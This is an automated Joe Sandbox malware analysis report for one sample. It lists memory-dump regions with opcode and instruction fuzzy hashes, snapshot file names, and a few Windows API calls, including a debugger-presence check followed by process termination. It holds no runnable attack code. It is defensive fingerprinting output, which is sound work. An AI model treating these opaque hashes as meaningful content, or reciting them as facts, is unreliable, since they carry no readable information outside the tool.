                                                                                                                                      • Opcode Fuzzy Hash: 73fc3d2357291078e16b9ce7aa918c138ed95f6e4701e2c2cd798666e853066a
                                                                                                                                      • Instruction Fuzzy Hash: 3A11E838E402498FEB40DFE8D850BDEBBF5AF88315F409065E908E7749E6319D418B95
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000000.00000002.3679845153.00000000020BD000.00000040.00000800.00020000.00000000.sdmp, Offset: 020BD000, based on PE: false
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_0_2_20bd000_173260890731de59c5efad150425b91227bfd141970725ea0b2bb1ec29e5892bd38992.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID:
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID:
                                                                                                                                      • Opcode ID: 04350605a9db7d138f2fbe48ca01c73726ab69fdae8acd1ee8d1c9fc5ffa3134
                                                                                                                                      • Instruction ID: 3c95295669059e1ef0280acc386d3bdc2a156ae2680a5a76068fec1b523a8f4c
                                                                                                                                      • Opcode Fuzzy Hash: 04350605a9db7d138f2fbe48ca01c73726ab69fdae8acd1ee8d1c9fc5ffa3134
                                                                                                                                      • Instruction Fuzzy Hash: 5011BE75504280DFCB16CF14D5C0B55FBB1FB48324F24C6A9D8494B256C33AD44ACB61
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000000.00000002.3680156839.0000000002160000.00000040.00000800.00020000.00000000.sdmp, Offset: 02160000, based on PE: false
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_0_2_2160000_173260890731de59c5efad150425b91227bfd141970725ea0b2bb1ec29e5892bd38992.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID:
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID:
                                                                                                                                      • Opcode ID: 374d9dd7aad5249409427ba62509c4d20cbba83a9aca2c9b4995ef1e9b6a980e
                                                                                                                                      • Instruction ID: 1b2d24104df3ee38f8611f566453711922b241388206d188591b0a1e86ffca8a
                                                                                                                                      • Opcode Fuzzy Hash: 374d9dd7aad5249409427ba62509c4d20cbba83a9aca2c9b4995ef1e9b6a980e
                                                                                                                                      • Instruction Fuzzy Hash: 68012832B401156FCB159E5898086FF3BEBEBCC350F14842AF915D7250DB35D822DB94
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000000.00000002.3680156839.0000000002160000.00000040.00000800.00020000.00000000.sdmp, Offset: 02160000, based on PE: false
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_0_2_2160000_173260890731de59c5efad150425b91227bfd141970725ea0b2bb1ec29e5892bd38992.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID:
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID:
                                                                                                                                      • Opcode ID: 1f372465d16ad8b951db57186622e10e2b878acc93ef545fd547135286f4b1d9
                                                                                                                                      • Instruction ID: 5e97327e9ff2a5cc6eb1c8f3fea326c0ab6245692d194f3ba5453f7836eee528
                                                                                                                                      • Opcode Fuzzy Hash: 1f372465d16ad8b951db57186622e10e2b878acc93ef545fd547135286f4b1d9
                                                                                                                                      • Instruction Fuzzy Hash: 56015EB0C49208DFCB15DFB9E4042BDBBF9EB4A300F2090EAD40AA3651E7344A55CB95
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000000.00000002.3679392607.000000000053D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0053D000, based on PE: false
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_0_2_53d000_173260890731de59c5efad150425b91227bfd141970725ea0b2bb1ec29e5892bd38992.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID:
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID:
                                                                                                                                      • Opcode ID: 08efac56a8b22e9561b3b4357650ab88de0ce49a7057eb96e4dbb34eb3548523
                                                                                                                                      • Instruction ID: 448886e3801a70a1a59eafe9d552de91f5ff5978a92bb4cb332aaf2f0bcde3a1
                                                                                                                                      • Opcode Fuzzy Hash: 08efac56a8b22e9561b3b4357650ab88de0ce49a7057eb96e4dbb34eb3548523
                                                                                                                                      • Instruction Fuzzy Hash: A001F7315043409AE7244A21EC88B66BFB8EF41B25F18C559EC580F182D2799C46CAB1
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000000.00000002.3679392607.000000000053D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0053D000, based on PE: false
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_0_2_53d000_173260890731de59c5efad150425b91227bfd141970725ea0b2bb1ec29e5892bd38992.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID:
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID:
                                                                                                                                      • Opcode ID: 1c002e6efac119583af2106579961e7f0b1fdbcca945f84b4342124a47b8ad33
                                                                                                                                      • Instruction ID: 04672a37c4b22a9289a8a909500db215bf4913be042211885748971bbd46156f
                                                                                                                                      • Opcode Fuzzy Hash: 1c002e6efac119583af2106579961e7f0b1fdbcca945f84b4342124a47b8ad33
                                                                                                                                      • Instruction Fuzzy Hash: 59014C6100E3C09ED7178B259C98B52BFB8EF53624F1981DBD8888F1A3C2699C49C772
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000000.00000002.3680156839.0000000002160000.00000040.00000800.00020000.00000000.sdmp, Offset: 02160000, based on PE: false
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_0_2_2160000_173260890731de59c5efad150425b91227bfd141970725ea0b2bb1ec29e5892bd38992.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID:
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID:
                                                                                                                                      • Opcode ID: 16be67e6d92a845f095a3fe4c5f6286efb39a12719f3e8f012ce22304c5c2582
                                                                                                                                      • Instruction ID: bcc110f7510b04502f6d851b97027123040bdae9aee9a7bf1e073a5071dbcf69
                                                                                                                                      • Opcode Fuzzy Hash: 16be67e6d92a845f095a3fe4c5f6286efb39a12719f3e8f012ce22304c5c2582
                                                                                                                                      • Instruction Fuzzy Hash: 7A113974D40209EFCB00DFA8D444EAEBBB1EB89300F508425D515A3364E7306A16DF81
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000000.00000002.3687882365.0000000006410000.00000040.00000800.00020000.00000000.sdmp, Offset: 06410000, based on PE: false
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_0_2_6410000_173260890731de59c5efad150425b91227bfd141970725ea0b2bb1ec29e5892bd38992.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID:
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID:
                                                                                                                                      • Opcode ID: 81e1ecb5a39934053afa30a501d28d63214168972ab91270efc6be0cbe44b4a6
                                                                                                                                      • Instruction ID: 6ff63545025ffe568fa11f0f1134701934569831502bc7d4dc40edd2105affd6
                                                                                                                                      • Opcode Fuzzy Hash: 81e1ecb5a39934053afa30a501d28d63214168972ab91270efc6be0cbe44b4a6
                                                                                                                                      • Instruction Fuzzy Hash: 60012C7AE102248FD790EFBCD40899A7BF4EF4C226711456AE805DB310EB32DD068B91
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000000.00000002.3680156839.0000000002160000.00000040.00000800.00020000.00000000.sdmp, Offset: 02160000, based on PE: false
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_0_2_2160000_173260890731de59c5efad150425b91227bfd141970725ea0b2bb1ec29e5892bd38992.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID:
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID:
                                                                                                                                      • Opcode ID: e46b9e515bc07394f1dd64107d60e690ed970404c2b091d8cf871f56181ed7d7
                                                                                                                                      • Instruction ID: d1c37b27d2cd12dede862ac0e4d5f4d51238007e5a9e39dbdc3d8579483ff4c3
                                                                                                                                      • Opcode Fuzzy Hash: e46b9e515bc07394f1dd64107d60e690ed970404c2b091d8cf871f56181ed7d7
                                                                                                                                      • Instruction Fuzzy Hash: 53F04C383456494BE705EB68E8587757B7AEFC0108F04C425D8098B50AEBA69817C760
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000000.00000002.3687882365.0000000006410000.00000040.00000800.00020000.00000000.sdmp, Offset: 06410000, based on PE: false
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_0_2_6410000_173260890731de59c5efad150425b91227bfd141970725ea0b2bb1ec29e5892bd38992.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID:
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID:
                                                                                                                                      • Opcode ID: 2aa95a929873399a9c8b03f65c4aa92556e0415a6bccae4797aeb749497e2de7
                                                                                                                                      • Instruction ID: ae708cfdfc3263f0046f61879f4f244bd9786dea99dcf1d67de4dfd3a77694b5
                                                                                                                                      • Opcode Fuzzy Hash: 2aa95a929873399a9c8b03f65c4aa92556e0415a6bccae4797aeb749497e2de7
                                                                                                                                      • Instruction Fuzzy Hash: 48F090383052418FE7559B3AE858DBB3BAAEFC671471540EAF405CF2A2DA61DC03CB90
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000000.00000002.3687882365.0000000006410000.00000040.00000800.00020000.00000000.sdmp, Offset: 06410000, based on PE: false
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_0_2_6410000_173260890731de59c5efad150425b91227bfd141970725ea0b2bb1ec29e5892bd38992.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID:
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID:
                                                                                                                                      • Opcode ID: 7bc4328b8c9b9346826c45043adfc124a077300668572eb961eedca2b5b844c8
                                                                                                                                      • Instruction ID: 4a889ecd456d1b77c2ab977c3faa1d32067d1c8a961445b8c0bab9abc288566e
                                                                                                                                      • Opcode Fuzzy Hash: 7bc4328b8c9b9346826c45043adfc124a077300668572eb961eedca2b5b844c8
                                                                                                                                      • Instruction Fuzzy Hash: 1F01B670E402199FCB94EFB9D8046EEBBF5BF48201F14856AD419F7250EB3959068FD4
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000000.00000002.3687882365.0000000006410000.00000040.00000800.00020000.00000000.sdmp, Offset: 06410000, based on PE: false
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_0_2_6410000_173260890731de59c5efad150425b91227bfd141970725ea0b2bb1ec29e5892bd38992.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID:
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID:
                                                                                                                                      • Opcode ID: 0fe3676f117ef05cd985005f3663a5776410d4937fb5db1853b4a8db1ccc663b
                                                                                                                                      • Instruction ID: 13f3566cf57d071661ae64c59f3257b0a54e50fd8deed93d49d22b9a52a0dd95
                                                                                                                                      • Opcode Fuzzy Hash: 0fe3676f117ef05cd985005f3663a5776410d4937fb5db1853b4a8db1ccc663b
                                                                                                                                      • Instruction Fuzzy Hash: EBF082343401058FE708AF2AE85893A37AAEFC5711B04446AF906CF361DE60EC028BD0
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000000.00000002.3680156839.0000000002160000.00000040.00000800.00020000.00000000.sdmp, Offset: 02160000, based on PE: false
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_0_2_2160000_173260890731de59c5efad150425b91227bfd141970725ea0b2bb1ec29e5892bd38992.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID:
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID:
                                                                                                                                      • Opcode ID: 6bc9a968e6eb922f1589973fdf38a2d012918a99dde9e03a1bfadfd2734f1b5b
                                                                                                                                      • Instruction ID: 579c036ebf8ac08e40b494e82357da91528ffca688d158b06c962eeb6d9adb79
                                                                                                                                      • Opcode Fuzzy Hash: 6bc9a968e6eb922f1589973fdf38a2d012918a99dde9e03a1bfadfd2734f1b5b
                                                                                                                                      • Instruction Fuzzy Hash: F3E0D831D1135547CB069760D8141DDBB35EE92211F418666C4507B240EA216A1AC3E1
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000000.00000002.3687882365.0000000006410000.00000040.00000800.00020000.00000000.sdmp, Offset: 06410000, based on PE: false
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_0_2_6410000_173260890731de59c5efad150425b91227bfd141970725ea0b2bb1ec29e5892bd38992.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID:
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID:
                                                                                                                                      • Opcode ID: ee88f12bc79ebeb23df6fd945297b48ccd3fa8231ac8fe930c5b2baa265f1da4
                                                                                                                                      • Instruction ID: e0b2d3d563a530523b84d27e73c4c55fc673c4f39c025096fa353ca9e79cac3d
                                                                                                                                      • Opcode Fuzzy Hash: ee88f12bc79ebeb23df6fd945297b48ccd3fa8231ac8fe930c5b2baa265f1da4
                                                                                                                                      • Instruction Fuzzy Hash: BEE0483BA105649F8B51DB68E4148D93794EB482753050395ED25DB355D721C80987E4
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000000.00000002.3680156839.0000000002160000.00000040.00000800.00020000.00000000.sdmp, Offset: 02160000, based on PE: false
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_0_2_2160000_173260890731de59c5efad150425b91227bfd141970725ea0b2bb1ec29e5892bd38992.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID:
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID:
                                                                                                                                      • Opcode ID: 2bcc3d66a2979d039f7bf3d7df699601040d4a2ad49f41b015805debbf8dc107
                                                                                                                                      • Instruction ID: 57fcb7b713a7cc3cda5ba3b18cc872e01c18247b14ea8750140405754ef26a03
                                                                                                                                      • Opcode Fuzzy Hash: 2bcc3d66a2979d039f7bf3d7df699601040d4a2ad49f41b015805debbf8dc107
                                                                                                                                      • Instruction Fuzzy Hash: 84D02B31D2032A43CB00E7A5DC044EFFB38EEC1322B918322D41033000FB312658C2E1
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000000.00000002.3680156839.0000000002160000.00000040.00000800.00020000.00000000.sdmp, Offset: 02160000, based on PE: false
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_0_2_2160000_173260890731de59c5efad150425b91227bfd141970725ea0b2bb1ec29e5892bd38992.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID:
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID:
                                                                                                                                      • Opcode ID: 4bdaacd32790817b91c477bf05988045433f614a4c8c6b26760f84615e577b64
                                                                                                                                      • Instruction ID: 4b0022b225a2499ac272e6b17bbcffb9db1a238e4d99540da70c7a7bff8709d2
                                                                                                                                      • Opcode Fuzzy Hash: 4bdaacd32790817b91c477bf05988045433f614a4c8c6b26760f84615e577b64
                                                                                                                                      • Instruction Fuzzy Hash: 67C08C3328C1282BA228108FBD48EBBBB8CD3C12B4A220177F52CC320099539C9081F4
                                                                                                                                      APIs
                                                                                                                                      • IsDebuggerPresent.KERNEL32 ref: 004136F4
                                                                                                                                      • SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 00413709
                                                                                                                                      • UnhandledExceptionFilter.KERNEL32(0041FB80), ref: 00413714
                                                                                                                                      • GetCurrentProcess.KERNEL32(C0000409), ref: 00413730
                                                                                                                                      • TerminateProcess.KERNEL32(00000000), ref: 00413737
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000000.00000002.3678323240.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                      • Associated: 00000000.00000002.3678208117.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                      • Associated: 00000000.00000002.3678437532.000000000041B000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                      • Associated: 00000000.00000002.3678481845.0000000000422000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                      • Associated: 00000000.00000002.3678481845.0000000000426000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                      • Associated: 00000000.00000002.3678481845.0000000000435000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                      • Associated: 00000000.00000002.3678630985.0000000000436000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_173260890731de59c5efad150425b91227bfd141970725ea0b2bb1ec29e5892bd38992.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID: ExceptionFilterProcessUnhandled$CurrentDebuggerPresentTerminate
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID: 2579439406-0
                                                                                                                                      • Opcode ID: 8d1f5aed7c5dfd20079dd4d946f02ab3c4db913f1b194ab0176bc05653236347
                                                                                                                                      • Instruction ID: 93bf0ba95bc2a0faef8203f21c221f33afe887fd41373e09ae0fa508b254143b
                                                                                                                                      • Opcode Fuzzy Hash: 8d1f5aed7c5dfd20079dd4d946f02ab3c4db913f1b194ab0176bc05653236347
                                                                                                                                      • Instruction Fuzzy Hash: A521C3B4601204EFD720DF65E94A6457FB4FB08356F80407AE50887772E7B86682CF4D
                                                                                                                                      Strings
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000000.00000002.3678323240.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                      • Associated: 00000000.00000002.3678208117.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                      • Associated: 00000000.00000002.3678437532.000000000041B000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                      • Associated: 00000000.00000002.3678481845.0000000000422000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                      • Associated: 00000000.00000002.3678481845.0000000000426000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                      • Associated: 00000000.00000002.3678481845.0000000000435000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                      • Associated: 00000000.00000002.3678630985.0000000000436000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_173260890731de59c5efad150425b91227bfd141970725ea0b2bb1ec29e5892bd38992.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID:
                                                                                                                                      • String ID: @$@$PA
                                                                                                                                      • API String ID: 0-3039612711
                                                                                                                                      • Opcode ID: 524773d1bc2011db47f0014430bcd25baf081f96639b8f8b2c6f9a821cea509b
                                                                                                                                      • Instruction ID: 284407f43597d2b1529aa5dbb826e4f49811f0ea4eaa41d9cabafce47d44ff82
                                                                                                                                      • Opcode Fuzzy Hash: 524773d1bc2011db47f0014430bcd25baf081f96639b8f8b2c6f9a821cea509b
                                                                                                                                      • Instruction Fuzzy Hash: 64E159316083418FC724DF28C58066BB7E1AFD9314F14493EE8C5A7391EB79D949CB8A
                                                                                                                                      APIs
                                                                                                                                      • GetProcessHeap.KERNEL32 ref: 0040ADD0
                                                                                                                                      • HeapFree.KERNEL32(00000000,00000000,00000000), ref: 0040ADE1
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000000.00000002.3678323240.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                      • Associated: 00000000.00000002.3678208117.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                      • Associated: 00000000.00000002.3678437532.000000000041B000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                      • Associated: 00000000.00000002.3678481845.0000000000422000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                      • Associated: 00000000.00000002.3678481845.0000000000426000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                      • Associated: 00000000.00000002.3678481845.0000000000435000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                      • Associated: 00000000.00000002.3678630985.0000000000436000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_173260890731de59c5efad150425b91227bfd141970725ea0b2bb1ec29e5892bd38992.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID: Heap$FreeProcess
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID: 3859560861-0
                                                                                                                                      • Opcode ID: 97be969a41baf58eb72298c462d2c401217e5b830f10c891868ac5f2a1a85b43
                                                                                                                                      • Instruction ID: 72dd180cd7110ee49b406fd12918c6a771032a3efea8c67e715e4993f3fed615
                                                                                                                                      • Opcode Fuzzy Hash: 97be969a41baf58eb72298c462d2c401217e5b830f10c891868ac5f2a1a85b43
                                                                                                                                      • Instruction Fuzzy Hash: 54E09A312003009FC320AB61DC08FA337AAEF88311F04C829E55A936A0DB78EC42CB58
                                                                                                                                      APIs
                                                                                                                                      • SetUnhandledExceptionFilter.KERNEL32(Function_000123AF), ref: 004123F6
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000000.00000002.3678323240.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                      • Associated: 00000000.00000002.3678208117.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                      • Associated: 00000000.00000002.3678437532.000000000041B000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                      • Associated: 00000000.00000002.3678481845.0000000000422000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                      • Associated: 00000000.00000002.3678481845.0000000000426000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                      • Associated: 00000000.00000002.3678481845.0000000000435000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                      • Associated: 00000000.00000002.3678630985.0000000000436000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_173260890731de59c5efad150425b91227bfd141970725ea0b2bb1ec29e5892bd38992.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID: ExceptionFilterUnhandled
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID: 3192549508-0
                                                                                                                                      • Opcode ID: 4924e8eeaf860e2c76ee0bfea96ab0c911441afc8f12962253436aa9ca0899ee
                                                                                                                                      • Instruction ID: 17be93bd3878235df00445469c4c747c8dbd7a907b9f456768254b9c32cbcc1b
                                                                                                                                      • Opcode Fuzzy Hash: 4924e8eeaf860e2c76ee0bfea96ab0c911441afc8f12962253436aa9ca0899ee
                                                                                                                                      • Instruction Fuzzy Hash: CA900270661144D7865017705D0968669949B4C6427618471653DD4098DBAA40505569
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000000.00000002.3678323240.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                      • Associated: 00000000.00000002.3678208117.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                      • Associated: 00000000.00000002.3678437532.000000000041B000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                      • Associated: 00000000.00000002.3678481845.0000000000422000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                      • Associated: 00000000.00000002.3678481845.0000000000426000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                      • Associated: 00000000.00000002.3678481845.0000000000435000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                      • Associated: 00000000.00000002.3678630985.0000000000436000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_173260890731de59c5efad150425b91227bfd141970725ea0b2bb1ec29e5892bd38992.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID:
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID:
                                                                                                                                      • Opcode ID: 020392db844ceed98276714fd2150c2ad4a639f6bad3fb02a1d0621011a6745a
                                                                                                                                      • Instruction ID: cc67e10771130af0a5279b37c8f7fa75a2653c997645fd1ae8a0b8309c7f2627
                                                                                                                                      • Opcode Fuzzy Hash: 020392db844ceed98276714fd2150c2ad4a639f6bad3fb02a1d0621011a6745a
                                                                                                                                      • Instruction Fuzzy Hash: 48E1D6306083514FC708CF28C99456ABBE2EFC5304F198A7EE8D68B386D779D94ACB55
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000000.00000002.3688801407.0000000006450000.00000040.00000800.00020000.00000000.sdmp, Offset: 06450000, based on PE: false
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_0_2_6450000_173260890731de59c5efad150425b91227bfd141970725ea0b2bb1ec29e5892bd38992.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID:
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID:
                                                                                                                                      • Opcode ID: e2cf77c545422748bafdd5f4f645d40ed250a1d8c91948b55a160cff7d39b732
                                                                                                                                      • Instruction ID: ce798669a10b3d3aa0e79e3bb120d5727fcd948a8e1508f0686beadd9910d81f
                                                                                                                                      • Opcode Fuzzy Hash: e2cf77c545422748bafdd5f4f645d40ed250a1d8c91948b55a160cff7d39b732
                                                                                                                                      • Instruction Fuzzy Hash: AED19E78E01218CFDB54DFA5C894BADBBB2BF89304F5081AAD409AB355DB359E81CF50
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000000.00000002.3688801407.0000000006450000.00000040.00000800.00020000.00000000.sdmp, Offset: 06450000, based on PE: false
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_0_2_6450000_173260890731de59c5efad150425b91227bfd141970725ea0b2bb1ec29e5892bd38992.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID:
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID:
                                                                                                                                      • Opcode ID: 843e5627a4667f0c2ba24d3422e6cb79fdf0ff521915d9c9be6eb5407aa69591
                                                                                                                                      • Instruction ID: 64b6db8b398f24876ec51ffadd037c7a19c161b58f9bac2b8e6e5a59202c2100
                                                                                                                                      • Opcode Fuzzy Hash: 843e5627a4667f0c2ba24d3422e6cb79fdf0ff521915d9c9be6eb5407aa69591
                                                                                                                                      • Instruction Fuzzy Hash: BBD18E74E01218CFEB54DFA5C894BADBBB2BF89304F5081AAD409AB355DB359E81CF50
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000000.00000002.3688801407.0000000006450000.00000040.00000800.00020000.00000000.sdmp, Offset: 06450000, based on PE: false
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_0_2_6450000_173260890731de59c5efad150425b91227bfd141970725ea0b2bb1ec29e5892bd38992.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID:
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID:
                                                                                                                                      • Opcode ID: 33d9b4eac703d57b50b573c841558545855878a45de5a365c8ced31409ebccb0
                                                                                                                                      • Instruction ID: 28646f293b07584fcbc1f71b4bb8fc3da4c99959d1448db905ca4f0646199233
                                                                                                                                      • Opcode Fuzzy Hash: 33d9b4eac703d57b50b573c841558545855878a45de5a365c8ced31409ebccb0
                                                                                                                                      • Instruction Fuzzy Hash: 45D19178E01218CFDB54DFA5C894B9DBBB2BF89304F5081AAD409A7355DB359E81CF50
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000000.00000002.3688801407.0000000006450000.00000040.00000800.00020000.00000000.sdmp, Offset: 06450000, based on PE: false
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_0_2_6450000_173260890731de59c5efad150425b91227bfd141970725ea0b2bb1ec29e5892bd38992.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID:
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID:
                                                                                                                                      • Opcode ID: 482d888448a92a9cab212548844e97a5edb3f873c025ca94c91e908f940decee
                                                                                                                                      • Instruction ID: 31d43608a964bae22bd83a7eef227185ee6ec09f27176b0ee52f05d73600be8c
                                                                                                                                      • Opcode Fuzzy Hash: 482d888448a92a9cab212548844e97a5edb3f873c025ca94c91e908f940decee
                                                                                                                                      • Instruction Fuzzy Hash: E3D1AE78E00218CFDB54DFA5C894BADBBB2BF89304F1081AAD409AB355DB359E81CF50
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000000.00000002.3688801407.0000000006450000.00000040.00000800.00020000.00000000.sdmp, Offset: 06450000, based on PE: false
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_0_2_6450000_173260890731de59c5efad150425b91227bfd141970725ea0b2bb1ec29e5892bd38992.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID:
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID:
                                                                                                                                      • Opcode ID: 6fa6110f3ea1ad6ff9a8fed40940a2a239659160de2d12eec881121ce0c3f47e
                                                                                                                                      • Instruction ID: bfd80f518a691aee9f9e068b38b93ab9ac9ab50d9379996dc33a61a15aaca49e
                                                                                                                                      • Opcode Fuzzy Hash: 6fa6110f3ea1ad6ff9a8fed40940a2a239659160de2d12eec881121ce0c3f47e
